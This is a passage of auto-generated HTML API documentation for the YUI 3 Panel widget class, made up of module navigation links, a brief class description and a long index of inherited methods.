<li><a href="../modules/io-form.html">io-form</a></li>
<li><a href="../modules/io-nodejs.html">io-nodejs</a></li>
<li><a href="../modules/io-queue.html">io-queue</a></li>
<li><a href="../modules/io-upload-iframe.html">io-upload-iframe</a></li>
<li><a href="../modules/io-xdr.html">io-xdr</a></li>
<li><a href="../modules/json.html">json</a></li>
<li><a href="../modules/json-parse.html">json-parse</a></li>
<li><a href="../modules/json-stringify.html">json-stringify</a></li>
<li><a href="../modules/jsonp.html">jsonp</a></li>
<li><a href="../modules/jsonp-url.html">jsonp-url</a></li>
<li><a href="../modules/lazy-model-list.html">lazy-model-list</a></li>
<li><a href="../modules/loader.html">loader</a></li>
<li><a href="../modules/loader-base.html">loader-base</a></li>
<li><a href="../modules/matrix.html">matrix</a></li>
<li><a href="../modules/model.html">model</a></li>
<li><a href="../modules/model-list.html">model-list</a></li>
<li><a href="../modules/model-sync-rest.html">model-sync-rest</a></li>
<li><a href="../modules/node.html">node</a></li>
<li><a href="../modules/node-base.html">node-base</a></li>
<li><a href="../modules/node-core.html">node-core</a></li>
<li><a href="../modules/node-data.html">node-data</a></li>
<li><a href="../modules/node-deprecated.html">node-deprecated</a></li>
<li><a href="../modules/node-event-delegate.html">node-event-delegate</a></li>
<li><a href="../modules/node-event-html5.html">node-event-html5</a></li>
<li><a href="../modules/node-event-simulate.html">node-event-simulate</a></li>
<li><a href="../modules/node-flick.html">node-flick</a></li>
<li><a href="../modules/node-focusmanager.html">node-focusmanager</a></li>
<li><a href="../modules/node-load.html">node-load</a></li>
<li><a href="../modules/node-menunav.html">node-menunav</a></li>
<li><a href="../modules/node-pluginhost.html">node-pluginhost</a></li>
<li><a href="../modules/node-screen.html">node-screen</a></li>
<li><a href="../modules/node-scroll-info.html">node-scroll-info</a></li>
<li><a href="../modules/node-style.html">node-style</a></li>
<li><a href="../modules/oop.html">oop</a></li>
<li><a href="../modules/overlay.html">overlay</a></li>
<li><a href="../modules/panel.html">panel</a></li>
<li><a href="../modules/parallel.html">parallel</a></li>
<li><a href="../modules/pjax.html">pjax</a></li>
<li><a href="../modules/pjax-base.html">pjax-base</a></li>
<li><a href="../modules/pjax-content.html">pjax-content</a></li>
<li><a href="../modules/pjax-plugin.html">pjax-plugin</a></li>
<li><a href="../modules/plugin.html">plugin</a></li>
<li><a href="../modules/pluginhost.html">pluginhost</a></li>
<li><a href="../modules/pluginhost-base.html">pluginhost-base</a></li>
<li><a href="../modules/pluginhost-config.html">pluginhost-config</a></li>
<li><a href="../modules/profiler.html">profiler</a></li>
<li><a href="../modules/querystring.html">querystring</a></li>
<li><a href="../modules/querystring-parse.html">querystring-parse</a></li>
<li><a href="../modules/querystring-parse-simple.html">querystring-parse-simple</a></li>
<li><a href="../modules/querystring-stringify.html">querystring-stringify</a></li>
<li><a href="../modules/querystring-stringify-simple.html">querystring-stringify-simple</a></li>
<li><a href="../modules/queue-promote.html">queue-promote</a></li>
<li><a href="../modules/range-slider.html">range-slider</a></li>
<li><a href="../modules/recordset.html">recordset</a></li>
<li><a href="../modules/recordset-base.html">recordset-base</a></li>
<li><a href="../modules/recordset-filter.html">recordset-filter</a></li>
<li><a href="../modules/recordset-indexer.html">recordset-indexer</a></li>
<li><a href="../modules/recordset-sort.html">recordset-sort</a></li>
<li><a href="../modules/resize.html">resize</a></li>
<li><a href="../modules/resize-contrain.html">resize-contrain</a></li>
<li><a href="../modules/resize-plugin.html">resize-plugin</a></li>
<li><a href="../modules/resize-proxy.html">resize-proxy</a></li>
<li><a href="../modules/rollup.html">rollup</a></li>
<li><a href="../modules/router.html">router</a></li>
<li><a href="../modules/scrollview.html">scrollview</a></li>
<li><a href="../modules/scrollview-base.html">scrollview-base</a></li>
<li><a href="../modules/scrollview-base-ie.html">scrollview-base-ie</a></li>
<li><a href="../modules/scrollview-list.html">scrollview-list</a></li>
<li><a href="../modules/scrollview-paginator.html">scrollview-paginator</a></li>
<li><a href="../modules/scrollview-scrollbars.html">scrollview-scrollbars</a></li>
<li><a href="../modules/selection.html">selection</a></li>
<li><a href="../modules/selector-css2.html">selector-css2</a></li>
<li><a href="../modules/selector-css3.html">selector-css3</a></li>
<li><a href="../modules/selector-native.html">selector-native</a></li>
<li><a href="../modules/shim-plugin.html">shim-plugin</a></li>
<li><a href="../modules/slider.html">slider</a></li>
<li><a href="../modules/slider-base.html">slider-base</a></li>
<li><a href="../modules/slider-value-range.html">slider-value-range</a></li>
<li><a href="../modules/sortable.html">sortable</a></li>
<li><a href="../modules/sortable-scroll.html">sortable-scroll</a></li>
<li><a href="../modules/stylesheet.html">stylesheet</a></li>
<li><a href="../modules/substitute.html">substitute</a></li>
<li><a href="../modules/swf.html">swf</a></li>
<li><a href="../modules/swfdetect.html">swfdetect</a></li>
<li><a href="../modules/tabview.html">tabview</a></li>
<li><a href="../modules/test.html">test</a></li>
<li><a href="../modules/test-console.html">test-console</a></li>
<li><a href="../modules/text.html">text</a></li>
<li><a href="../modules/text-accentfold.html">text-accentfold</a></li>
<li><a href="../modules/text-wordbreak.html">text-wordbreak</a></li>
<li><a href="../modules/transition.html">transition</a></li>
<li><a href="../modules/transition-timer.html">transition-timer</a></li>
<li><a href="../modules/uploader.html">uploader</a></li>
<li><a href="../modules/uploader-deprecated.html">uploader-deprecated</a></li>
<li><a href="../modules/uploader-flash.html">uploader-flash</a></li>
<li><a href="../modules/uploader-html5.html">uploader-html5</a></li>
<li><a href="../modules/uploader-queue.html">uploader-queue</a></li>
<li><a href="../modules/view.html">view</a></li>
<li><a href="../modules/view-node-map.html">view-node-map</a></li>
<li><a href="../modules/widget.html">widget</a></li>
<li><a href="../modules/widget-anim.html">widget-anim</a></li>
<li><a href="../modules/widget-autohide.html">widget-autohide</a></li>
<li><a href="../modules/widget-base.html">widget-base</a></li>
<li><a href="../modules/widget-base-ie.html">widget-base-ie</a></li>
<li><a href="../modules/widget-buttons.html">widget-buttons</a></li>
<li><a href="../modules/widget-child.html">widget-child</a></li>
<li><a href="../modules/widget-htmlparser.html">widget-htmlparser</a></li>
<li><a href="../modules/widget-locale.html">widget-locale</a></li>
<li><a href="../modules/widget-modality.html">widget-modality</a></li>
<li><a href="../modules/widget-parent.html">widget-parent</a></li>
<li><a href="../modules/widget-position.html">widget-position</a></li>
<li><a href="../modules/widget-position-align.html">widget-position-align</a></li>
<li><a href="../modules/widget-position-constrain.html">widget-position-constrain</a></li>
<li><a href="../modules/widget-skin.html">widget-skin</a></li>
<li><a href="../modules/widget-stack.html">widget-stack</a></li>
<li><a href="../modules/widget-stdmod.html">widget-stdmod</a></li>
<li><a href="../modules/widget-uievents.html">widget-uievents</a></li>
<li><a href="../modules/yql.html">yql</a></li>
<li><a href="../modules/yql-nodejs.html">yql-nodejs</a></li>
<li><a href="../modules/yql-winjs.html">yql-winjs</a></li>
<li><a href="../modules/yui.html">yui</a></li>
<li><a href="../modules/yui-base.html">yui-base</a></li>
<li><a href="../modules/yui-later.html">yui-later</a></li>
<li><a href="../modules/yui-log.html">yui-log</a></li>
<li><a href="../modules/yui-throttle.html">yui-throttle</a></li>
<li><a href="../modules/yui3.html">yui3</a></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="yui3-u-3-4">
<div id="api-options">
Show:
<label for="api-show-inherited">
<input type="checkbox" id="api-show-inherited" checked>
Inherited
</label>
<label for="api-show-protected">
<input type="checkbox" id="api-show-protected">
Protected
</label>
<label for="api-show-private">
<input type="checkbox" id="api-show-private">
Private
</label>
<label for="api-show-deprecated">
<input type="checkbox" id="api-show-deprecated">
Deprecated
</label>
</div>
<div class="apidocs">
<div id="docs-main">
<div class="content">
<h1>Panel Class</h1>
<div class="box meta">
<div class="uses">
Uses
<ul class="inline commas">
<li><a href="WidgetAutohide.html">WidgetAutohide</a></li>
<li><a href="WidgetButtons.html">WidgetButtons</a></li>
<li><a href="WidgetModality.html">WidgetModality</a></li>
<li><a href="WidgetPosition.html">WidgetPosition</a></li>
<li><a href="WidgetPositionAlign.html">WidgetPositionAlign</a></li>
<li><a href="WidgetPositionConstrain.html">WidgetPositionConstrain</a></li>
<li><a href="WidgetStack.html">WidgetStack</a></li>
<li><a href="WidgetStdMod.html">WidgetStdMod</a></li>
</ul>
</div>
<div class="extends">
Extends <a href="../classes/Widget.html" class="crosslink">Widget</a>
</div>
<div class="foundat">
Defined in: <a href="../files/panel_js_panel.js.html#l14"><code>panel/js/panel.js:14</code></a>
</div>
Module: <a href="../modules/panel.html">panel</a>
<p>Available since 3.4.0</p>
</div>
<div class="box intro">
<p>A basic Panel Widget, which can be positioned based on Page XY co-ordinates and
is stackable (z-index support). It also provides alignment and centering support
and uses a standard module format for it's content, with header, body and footer
section support. It can be made modal, and has functionality to hide and focus
on different events. The header and footer sections can be modified to allow for
button support.</p>
</div>
<div class="constructor">
<h2>Constructor</h2>
<div id="method_Panel" class="method item">
<h3 class="name"><code>Panel</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>
Defined in
<a href="../files/panel_js_panel.js.html#l14"><code>panel/js/panel.js:14</code></a>
</p>
<p>Available since 3.4.0</p>
</div>
<div class="description">
</div>
</div>
</div>
<div id="classdocs" class="tabview">
<ul class="api-class-tabs">
<li class="api-class-tab index"><a href="#index">Index</a></li>
<li class="api-class-tab methods"><a href="#methods">Methods</a></li>
<li class="api-class-tab properties"><a href="#properties">Properties</a></li>
<li class="api-class-tab attrs"><a href="#attrs">Attributes</a></li>
<li class="api-class-tab events"><a href="#events">Events</a></li>
</ul>
<div>
<div id="index" class="api-class-tabpanel index">
<h2 class="off-left">Item Index</h2>
<div class="index-section methods">
<h3>Methods</h3>
<ul class="index-list methods extends">
<li class="index-item method private inherited">
<a href="#method__addAttrs">_addAttrs</a>
</li>
<li class="index-item method private inherited">
<a href="#method__addLazyAttr">_addLazyAttr</a>
</li>
<li class="index-item method private inherited">
<a href="#method__addShimResizeHandlers">_addShimResizeHandlers</a>
</li>
<li class="index-item method private inherited">
<a href="#method__addStdModContent">_addStdModContent</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterAlignChange">_afterAlignChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterAlignOnChange">_afterAlignOnChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterBodyChange">_afterBodyChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterButtonsChange">_afterButtonsChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterChildSelectedChange">_afterChildSelectedChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterConstrainChange">_afterConstrainChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterContentChangeButtons">_afterContentChangeButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterDefaultButtonChange">_afterDefaultButtonChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterFillHeightChange">_afterFillHeightChange</a>
</li>
<li class="index-item method inherited">
<a href="#method__afterFocusOnChange">_afterFocusOnChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterFooterChange">_afterFooterChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterHeaderChange">_afterHeaderChange</a>
</li>
<li class="index-item method inherited">
<a href="#method__afterHideOnChange">_afterHideOnChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterHostVisibleChangeAutohide">_afterHostVisibleChangeAutohide</a>
</li>
<li class="index-item method inherited">
<a href="#method__afterHostVisibleChangeModal">_afterHostVisibleChangeModal</a>
</li>
<li class="index-item method inherited">
<a href="#method__afterHostZIndexChangeModal">_afterHostZIndexChangeModal</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterShimChange">_afterShimChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterVisibleChangeButtons">_afterVisibleChangeButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterXYChange">_afterXYChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__afterZIndexChange">_afterZIndexChange</a>
</li>
<li class="index-item method private inherited">
<a href="#method__aggregateAttrs">_aggregateAttrs</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__applyParsedConfig">_applyParsedConfig</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__applyParser">_applyParser</a>
</li>
<li class="index-item method private inherited">
<a href="#method__applyStdModParsedConfig">_applyStdModParsedConfig</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__attachPosAlignUIHandles">_attachPosAlignUIHandles</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__attachUIHandlesAutohide">_attachUIHandlesAutohide</a>
</li>
<li class="index-item method inherited">
<a href="#method__attachUIHandlesModal">_attachUIHandlesModal</a>
</li>
<li class="index-item method private inherited inherited">
<a href="#method__attrCfgHash">_attrCfgHash</a>
</li>
<li class="index-item method private inherited">
<a href="#method__baseDestroy">_baseDestroy</a>
</li>
<li class="index-item method private inherited">
<a href="#method__baseInit">_baseInit</a>
</li>
<li class="index-item method private inherited">
<a href="#method__bindAttrUI">_bindAttrUI</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindDOM">_bindDOM</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUI">_bindUI</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIAutohide">_bindUIAutohide</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIButtons">_bindUIButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIChild">_bindUIChild</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIModal">_bindUIModal</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIPosAlign">_bindUIPosAlign</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIPosConstrained">_bindUIPosConstrained</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIPosition">_bindUIPosition</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIStack">_bindUIStack</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__bindUIStdMod">_bindUIStdMod</a>
</li>
<li class="index-item method inherited">
<a href="#method__blur">_blur</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__constrain">_constrain</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__constrainOnXYChange">_constrainOnXYChange</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__createButton">_createButton</a>
</li>
<li class="index-item method private inherited">
<a href="#method__createUIEvent">_createUIEvent</a>
</li>
<li class="index-item method private inherited">
<a href="#method__defAttrChangeFn">_defAttrChangeFn</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__defaultCB">_defaultCB</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__defDestroyFn">_defDestroyFn</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__defInitFn">_defInitFn</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__defRenderFn">_defRenderFn</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__destroyBox">_destroyBox</a>
</li>
<li class="index-item method private inherited">
<a href="#method__destroyHierarchy">_destroyHierarchy</a>
</li>
<li class="index-item method private inherited">
<a href="#method__destroyShim">_destroyShim</a>
</li>
<li class="index-item method private inherited">
<a href="#method__destroyUIEvents">_destroyUIEvents</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__detachPosAlignUIHandles">_detachPosAlignUIHandles</a>
</li>
<li class="index-item method private inherited">
<a href="#method__detachStackHandles">_detachStackHandles</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__detachUIHandlesAutohide">_detachUIHandlesAutohide</a>
</li>
<li class="index-item method inherited">
<a href="#method__detachUIHandlesModal">_detachUIHandlesModal</a>
</li>
<li class="index-item method private inherited">
<a href="#method__doAlign">_doAlign</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__eraseStdMod">_eraseStdMod</a>
</li>
<li class="index-item method private inherited">
<a href="#method__fillHeight">_fillHeight</a>
</li>
<li class="index-item method private inherited">
<a href="#method__filterAdHocAttrs">_filterAdHocAttrs</a>
</li>
<li class="index-item method private inherited">
<a href="#method__filterAttrCfs">_filterAttrCfs</a>
</li>
<li class="index-item method private inherited">
<a href="#method__filterUIEvent">_filterUIEvent</a>
</li>
<li class="index-item method private inherited">
<a href="#method__findStdModSection">_findStdModSection</a>
</li>
<li class="index-item method private inherited">
<a href="#method__fireAttrChange">_fireAttrChange</a>
</li>
<li class="index-item method inherited">
<a href="#method__focus">_focus</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getAttr">_getAttr</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getAttrCfg">_getAttrCfg</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getAttrCfgs">_getAttrCfgs</a>
</li>
<li class="index-item method private inherited inherited">
<a href="#method__getAttrInitVal">_getAttrInitVal</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getAttrs">_getAttrs</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getButtonContainer">_getButtonContainer</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getButtonDefault">_getButtonDefault</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getButtonName">_getButtonName</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getButtons">_getButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getClasses">_getClasses</a>
</li>
<li class="index-item method private inherited">
<a href="#method__getHtmlParser">_getHtmlParser</a>
</li>
<li class="index-item method inherited">
<a href="#method__getMaskNode">_getMaskNode</a>
</li>
<li class="index-item method private inherited">
<a href="#method__getNodeToParse">_getNodeToParse</a>
</li>
<li class="index-item method private inherited">
<a href="#method__getPreciseHeight">_getPreciseHeight</a>
</li>
<li class="index-item method private inherited inherited">
<a href="#method__getRegion">_getRegion</a>
</li>
<li class="index-item method private inherited">
<a href="#method__getShimTemplate">_getShimTemplate</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getSrcNode">_getSrcNode</a>
</li>
<li class="index-item method private inherited">
<a href="#method__getStateVal">_getStateVal</a>
</li>
<li class="index-item method private inherited">
<a href="#method__getStdModContent">_getStdModContent</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getStdModTemplate">_getStdModTemplate</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getStrings">_getStrings</a>
</li>
<li class="index-item method private inherited">
<a href="#method__getType">_getType</a>
</li>
<li class="index-item method protected inherited inherited">
<a href="#method__getUIEventNode">_getUIEventNode</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getX">_getX</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__getY">_getY</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__guid">_guid</a>
</li>
<li class="index-item method private inherited">
<a href="#method__initAttrHost">_initAttrHost</a>
</li>
<li class="index-item method private inherited inherited">
<a href="#method__initAttribute">_initAttribute</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__initAttrs">_initAttrs</a>
</li>
<li class="index-item method private inherited inherited">
<a href="#method__initBase">_initBase</a>
</li>
<li class="index-item method private inherited">
<a href="#method__initHierarchy">_initHierarchy</a>
</li>
<li class="index-item method private inherited">
<a href="#method__initHierarchyData">_initHierarchyData</a>
</li>
<li class="index-item method private inherited">
<a href="#method__initUIEvent">_initUIEvent</a>
</li>
<li class="index-item method private inherited">
<a href="#method__insertStdModSection">_insertStdModSection</a>
</li>
<li class="index-item method private inherited">
<a href="#method__isLazyAttr">_isLazyAttr</a>
</li>
<li class="index-item method private inherited">
<a href="#method__isUIEvent">_isUIEvent</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__mapButton">_mapButton</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__mapButtons">_mapButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__mapInstance">_mapInstance</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__mergeButtonConfig">_mergeButtonConfig</a>
</li>
<li class="index-item method private inherited">
<a href="#method__monitor">_monitor</a>
</li>
<li class="index-item method private inherited inherited">
<a href="#method__normAttrVals">_normAttrVals</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__onDocFocus">_onDocFocus</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__onDocMouseDown">_onDocMouseDown</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__parseButtons">_parseButtons</a>
</li>
<li class="index-item method private inherited">
<a href="#method__parseStdModHTML">_parseStdModHTML</a>
</li>
<li class="index-item method private inherited">
<a href="#method__parseType">_parseType</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__parseZIndex">_parseZIndex</a>
</li>
<li class="index-item method private inherited">
<a href="#method__preInitEventCfg">_preInitEventCfg</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__preventOverlap">_preventOverlap</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__protectAttrs">_protectAttrs</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__removeLoadingClassNames">_removeLoadingClassNames</a>
</li>
<li class="index-item method private inherited">
<a href="#method__renderBox">_renderBox</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__renderBoxClassNames">_renderBoxClassNames</a>
</li>
<li class="index-item method private inherited">
<a href="#method__renderShim">_renderShim</a>
</li>
<li class="index-item method private inherited">
<a href="#method__renderShimDeferred">_renderShimDeferred</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__renderStdMod">_renderStdMod</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__renderUI">_renderUI</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__renderUIModal">_renderUIModal</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__renderUIPosition">_renderUIPosition</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__renderUIStack">_renderUIStack</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__renderUIStdMod">_renderUIStdMod</a>
</li>
<li class="index-item method inherited">
<a href="#method__repositionMask">_repositionMask</a>
</li>
<li class="index-item method private inherited">
<a href="#method__resyncMask">_resyncMask</a>
</li>
<li class="index-item method protected inherited inherited">
<a href="#method__set">_set</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setAlignCenter">_setAlignCenter</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setAttr">_setAttr</a>
</li>
<li class="index-item method protected inherited inherited">
<a href="#method__setAttrs">_setAttrs</a>
</li>
<li class="index-item method private inherited">
<a href="#method__setAttrUI">_setAttrUI</a>
</li>
<li class="index-item method private inherited">
<a href="#method__setAttrVal">_setAttrVal</a>
</li>
<li class="index-item method private inherited">
<a href="#method__setBB">_setBB</a>
</li>
<li class="index-item method private inherited">
<a href="#method__setBox">_setBox</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setButtons">_setButtons</a>
</li>
<li class="index-item method private inherited">
<a href="#method__setCB">_setCB</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setConstrain">_setConstrain</a>
</li>
<li class="index-item method private inherited">
<a href="#method__setStateVal">_setStateVal</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setStrings">_setStrings</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setX">_setX</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setY">_setY</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__setZIndex">_setZIndex</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__strSetter">_strSetter</a>
</li>
<li class="index-item method private inherited">
<a href="#method__syncAttrUI">_syncAttrUI</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUI">_syncUI</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIAutohide">_syncUIAutohide</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIButtons">_syncUIButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIChild">_syncUIChild</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIModal">_syncUIModal</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIPosAlign">_syncUIPosAlign</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIPosition">_syncUIPosition</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIStack">_syncUIStack</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__syncUIStdMod">_syncUIStdMod</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiInsertButton">_uiInsertButton</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiRemoveButton">_uiRemoveButton</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetAlign">_uiSetAlign</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetButtons">_uiSetButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetChildSelected">_uiSetChildSelected</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetDefaultButton">_uiSetDefaultButton</a>
</li>
<li class="index-item method private inherited">
<a href="#method__uiSetDim">_uiSetDim</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetDisabled">_uiSetDisabled</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetFillHeight">_uiSetFillHeight</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetFocused">_uiSetFocused</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetHeight">_uiSetHeight</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetHostVisibleAutohide">_uiSetHostVisibleAutohide</a>
</li>
<li class="index-item method inherited">
<a href="#method__uiSetHostVisibleModal">_uiSetHostVisibleModal</a>
</li>
<li class="index-item method inherited">
<a href="#method__uiSetHostZIndexModal">_uiSetHostZIndexModal</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetShim">_uiSetShim</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetStdMod">_uiSetStdMod</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetTabIndex">_uiSetTabIndex</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetVisible">_uiSetVisible</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetVisibleButtons">_uiSetVisibleButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetVisiblePosAlign">_uiSetVisiblePosAlign</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetWidth">_uiSetWidth</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetXY">_uiSetXY</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSetZIndex">_uiSetZIndex</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__uiSizeCB">_uiSizeCB</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__unbindDOM">_unbindDOM</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__unbindUI">_unbindUI</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__unMapButton">_unMapButton</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__updateContentButtons">_updateContentButtons</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__updateDefaultButton">_updateDefaultButton</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__validateFillHeight">_validateFillHeight</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__validateXY">_validateXY</a>
</li>
<li class="index-item method protected inherited">
<a href="#method__validTabIndex">_validTabIndex</a>
</li>
<li class="index-item method inherited">
<a href="#method_addAttr">addAttr</a>
</li>
<li class="index-item method inherited">
<a href="#method_addAttrs">addAttrs</a>
</li>
<li class="index-item method inherited">
<a href="#method_addButton">addButton</a>
</li>
<li class="index-item method inherited">
<a href="#method_addTarget">addTarget</a>
</li>
<li class="index-item method inherited">
<a href="#method_after">after</a>
</li>
<li class="index-item method inherited">
<a href="#method_align">align</a>
</li>
<li class="index-item method inherited">
<a href="#method_ancestor">ancestor</a>
</li>
<li class="index-item method inherited">
<a href="#method_attrAdded">attrAdded</a>
</li>
<li class="index-item method inherited">
<a href="#method_before">before</a>
</li>
<li class="index-item method protected inherited">
<a href="#method_bindUI">bindUI</a>
</li>
<li class="index-item method inherited">
<a href="#method_blur">blur</a>
</li>
<li class="index-item method inherited">
<a href="#method_bubble">bubble</a>
</li>
<li class="index-item method inherited">
<a href="#method_centered">centered</a>
</li>
<li class="index-item method inherited">
<a href="#method_constrain">constrain</a>
</li>
<li class="index-item method inherited inherited">
<a href="#method_destroy">destroy</a>
</li>
<li class="index-item method protected inherited">
<a href="#method_destructor">destructor</a>
</li>
<li class="index-item method inherited">
<a href="#method_detach">detach</a>
</li>
<li class="index-item method inherited">
<a href="#method_detachAll">detachAll</a>
</li>
<li class="index-item method inherited">
<a href="#method_disable">disable</a>
</li>
<li class="index-item method inherited">
<a href="#method_enable">enable</a>
</li>
<li class="index-item method private inherited">
<a href="#method_enable or disable constraints listeners">enable or disable constraints listeners</a>
</li>
<li class="index-item method inherited">
<a href="#method_fillHeight">fillHeight</a>
</li>
<li class="index-item method inherited">
<a href="#method_fire">fire</a>
</li>
<li class="index-item method inherited">
<a href="#method_focus">focus</a>
</li>
<li class="index-item method inherited">
<a href="#method_get">get</a>
</li>
<li class="index-item method inherited">
<a href="#method_getAttrs">getAttrs</a>
</li>
<li class="index-item method inherited">
<a href="#method_getButton">getButton</a>
</li>
<li class="index-item method inherited inherited">
<a href="#method_getClassName">getClassName</a>
</li>
<li class="index-item method inherited">
<a href="#method_getConstrainedXY">getConstrainedXY</a>
</li>
<li class="index-item method inherited">
<a href="#method_getDefaultLocale">getDefaultLocale</a>
</li>
<li class="index-item method inherited">
<a href="#method_getEvent">getEvent</a>
</li>
<li class="index-item method inherited">
<a href="#method_getSkinName">getSkinName</a>
</li>
<li class="index-item method inherited">
<a href="#method_getStdModNode">getStdModNode</a>
</li>
<li class="index-item method deprecated inherited inherited">
<a href="#method_getString">getString</a>
<span class="flag deprecated">deprecated</span>
</li>
<li class="index-item method deprecated inherited inherited">
